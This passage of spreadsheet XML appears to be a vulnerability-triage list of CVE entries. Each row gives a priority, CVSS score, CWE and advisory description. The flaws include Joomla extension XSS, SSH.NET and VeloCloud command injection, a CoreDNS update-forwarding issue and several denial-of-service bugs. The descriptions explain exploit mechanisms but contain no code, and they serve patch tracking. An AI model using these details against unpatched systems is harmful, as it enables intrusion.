      </c>
      <c r="F647" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr"/>
      <c r="Q647" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R647" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via executable URL schemes in Modals extension for Joomla &lt; 17.0.0 - Modals treats a destination using an executable browser URL scheme as an ordinary modal URL. The value can reach both the generated link and the iframe-loading path. Authored content can consequently become JavaScript in a visitor's browser without using Modals' separate Pro JavaScript Events feature.</t>
        </is>
      </c>
      <c r="S647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85189</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85190</t>
        </is>
      </c>
      <c r="D648" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F648" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr"/>
      <c r="Q648" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R648" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via class option in Quick Index extension for Joomla &lt; 5.0.5 - Quick Index inserts configurable class values into generated HTML without escaping them for an HTML attribute. A crafted value can close the intended class attribute and introduce a new attribute. Joomla's content filter cannot reliably prevent this because Quick Index creates the executable HTML after the authored plugin syntax was filtered.</t>
        </is>
      </c>
      <c r="S648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85190</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85191</t>
        </is>
      </c>
      <c r="D649" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F649" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr"/>
      <c r="Q649" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R649" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via rtla-alias option in Tabs &amp; Accordions extension for Joomla &lt; 3.1.0 - Tabs &amp; Accordions rewrites links matching an item alias into calls to its browser API. The affected renderer places the alias inside a quoted JavaScript argument in an HTML onclick attribute without securing both the JavaScript-string and HTML-attribute contexts. A crafted data-rlta-alias value can therefore change the generated handler.</t>
        </is>
      </c>
      <c r="S649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85191</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85195</t>
        </is>
      </c>
      <c r="D650" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F650" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr"/>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr"/>
      <c r="Q650" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R650" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via link option in Articles Anywhere extension for Joomla &lt; 20.0.0 - Articles Anywhere accepts link options such as onclick and onmouseover. In affected versions, those options become real HTML event attributes without checking the article author's trust level. The plugin syntax survives Joomla's normal Author content filter because the executable HTML is generated later.</t>
        </is>
      </c>
      <c r="S650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85195</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85756</t>
        </is>
      </c>
      <c r="D651" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F651" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr"/>
      <c r="Q651" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R651" s="5" t="inlineStr">
        <is>
          <t>SSH.NET is a Secure Shell (SSH) library for .NET. Prior to 2026.0.0, ScpClient places caller-supplied remote paths into the command used to run scp on the server, and the default RemotePathTransformation.DoubleQuote transformation cannot safely quote every remote command interpreter. When an application passes an attacker-controlled path to a shell-based server, shell metacharacters not neutralized by the active IRemotePathTransformation can execute commands as the authenticated SSH user. Exploitation requires a shell-based server and a path crafted for that shell's parsing rules; non-shell servers and paths fully neutralized by the selected transformation are not affected. RemotePathTransformation.ShellQuote is available for POSIX shells, while SftpClient avoids a remote shell entirely. This issue is fixed in version 2026.0.0.</t>
        </is>
      </c>
      <c r="S651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85756</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D652" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F652" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr"/>
      <c r="Q652" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R652" s="5" t="inlineStr">
        <is>
          <t>CoreDNS is a DNS server written in Go. Prior to 1.14.7, the DNS-over-HTTPS, DNS-over-HTTP/3, DNS-over-QUIC, and DNS-over-gRPC listeners in plugin/pkg/doh/doh.go, core/dnsserver/server_quic.go, and core/dnsserver/server_grpc.go call dns.Msg.Unpack without the dns.DefaultMsgAcceptFunc request policy used by UDP, TCP, and DNS-over-TLS. An unauthenticated client can send an RFC 2136 UPDATE that the proxy or forward plugin passes unchanged to an update-capable upstream. If that upstream trusts CoreDNS's source address or connection and does not require an attacker-unknown end-to-end TSIG, the request appears to originate from CoreDNS and can add, replace, or delete DNS records, redirect traffic, take over names, alter mail routing, or disrupt the writable zone. This issue is fixed in version 1.14.7.</t>
        </is>
      </c>
      <c r="S652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D653" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F653" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="inlineStr"/>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr"/>
      <c r="Q653" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R653" s="5" t="inlineStr">
        <is>
          <t>Skipper is an HTTP router and reverse proxy for service composition. Prior to version 0.27.37, the opaAuthorizeRequestWithBody filter can authorize an oversized request after Skipper truncates the body presented to Open Policy Agent because the input.truncated_body signal is derived from Content-Length rather than the actual read result. In filters/openpolicyagent/openpolicyagent.go, ExtractHttpBodyOptionally truncates bodies at maxBodyBytes, while filters/openpolicyagent/internal/envoy/skipperadapter.go copies the request headers without adding a Content-Length value that reflects the truncation. For an HTTP/1.1 request using Transfer-Encoding: chunked or an HTTP/2 request without Content-Length, a body-inspecting policy that follows the prior mitigation and permits input.truncated_body equal to false can evaluate only the truncated prefix, allow the request, and then forward the full oversized body to the protected upstream. This residual issue is distinct from CVE-2026-50197. This issue is fixed in version 0.27.37.</t>
        </is>
      </c>
      <c r="S653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86108</t>
        </is>
      </c>
      <c r="D654" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F654" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr"/>
      <c r="Q654" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R654" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of inputs supplied through affected VeloCloud Edge management and configuration workflows may allow an authorized management request or configuration value to be interpreted as an operating-system command. Successful exploitation may allow command execution with elevated privileges on the affected VeloCloud Edge.</t>
        </is>
      </c>
      <c r="S654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86108</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86109</t>
        </is>
      </c>
      <c r="D655" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F655" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr"/>
      <c r="Q655" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R655" s="5" t="inlineStr">
        <is>
          <t>The VeloCloud Edge software update workflow may accept update bundles without properly validating their signatures because the workflow does not restrict the digest algorithm used for artifact verification. An attacker with either sufficient privileges to upload packages to VeloCloud Orchestrator or credentials permitting direct access to an Edge may be able to install unauthorized software.</t>
        </is>
      </c>
      <c r="S655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86109</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86894</t>
        </is>
      </c>
      <c r="D656" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F656" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr"/>
      <c r="Q656" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R656" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved checks. This issue is fixed in macOS Golden Gate 27. An app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86894</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86895</t>
        </is>
      </c>
      <c r="D657" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F657" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr"/>
      <c r="Q657" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R657" s="5" t="inlineStr">
        <is>
          <t>An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 27 and iPadOS 27, tvOS 27, visionOS 27, watchOS 27. A local app may be able to read a persistent account identifier.</t>
        </is>
      </c>
      <c r="S657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86895</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86904</t>
        </is>
      </c>
      <c r="D658" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F658" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:watchos</t>
        </is>
      </c>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr"/>
      <c r="Q658" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="R658" s="5" t="inlineStr">
        <is>
          <t>A privacy issue was addressed with improved state management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, watchOS 27. An app may be able to track users across apps and websites without permission.</t>
        </is>
      </c>
      <c r="S658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86904</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87776</t>
        </is>
      </c>
      <c r="D659" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F659" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr"/>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr"/>
      <c r="Q659" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-459</t>
        </is>
      </c>
      <c r="R659" s="5" t="inlineStr">
        <is>
          <t>compression is a Node.js and Express compression middleware. In versions before 1.8.2, when a client aborts the connection while a compressed response is still being sent, the zlib stream created to compress that response is never destroyed, so each aborted compressed response leaks its native zlib memory. A remote unauthenticated attacker can repeatedly open requests and disconnect early, exhausting the available memory and crashing the server. All applications using compression are affected. The issue is fixed in compression 1.8.2, and users should upgrade to 1.8.2 or later.</t>
        </is>
      </c>
      <c r="S659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87776</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D660" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr"/>
      <c r="Q660" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R660" s="5" t="inlineStr">
        <is>
          <t>GitPython before 3.1.60 contains a regular expression denial of service vulnerability in Actor.name_email_regex that processes commit author and committer fields. Attackers can craft a commit object with a malformed author field containing an unterminated angle bracket to cause quadratic backtracking, exhausting CPU resources for over two minutes per commit access.</t>
        </is>
      </c>
      <c r="S660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87908</t>
        </is>
      </c>
      <c r="D661" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F661" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr"/>
      <c r="Q661" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R661" s="5" t="inlineStr">
        <is>
          <t>multiparty is a Node.js library for parsing multipart/form-data request bodies. In versions from 2.1.0 up to but not including 4.3.1, the parser does not bound the amount of memory used while accumulating the headers of a single multipart part. An unauthenticated attacker can send a single request whose part carries a very large volume of header bytes, forcing the parser to buffer all of them and exhausting the process memory, which crashes the server. This is a denial of service with no confidentiality or integrity impact. The issue is fixed in multiparty 4.3.1, which caps the size of the accumulated part headers. Users should upgrade to multiparty 4.3.1 or later.</t>
        </is>
      </c>
      <c r="S661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87908</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88032</t>
        </is>
      </c>
      <c r="D662" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K662" s="5" t="inlineStr">
        <is>
          <t>mongodb:java_driver</t>
        </is>
      </c>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr"/>
      <c r="Q662" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R662" s="5" t="inlineStr">
        <is>
          <t>A use-after-free in the reactive client-side encryption component of the MongoDB Java Driver can cause native resources to be freed while an affected encrypted operation is still using them when the operation is cancelled. A party able to cause such an operation to be cancelled may cause the hosting application process to terminate. Reaching the issue requires an affected reactive encryption configuration that retrieves KMS credentials on demand.</t>
        </is>
      </c>
      <c r="S662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88032</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88852</t>
        </is>
      </c>
      <c r="D663" s="5" t="n">
        <v>7.5</v>
      </c>
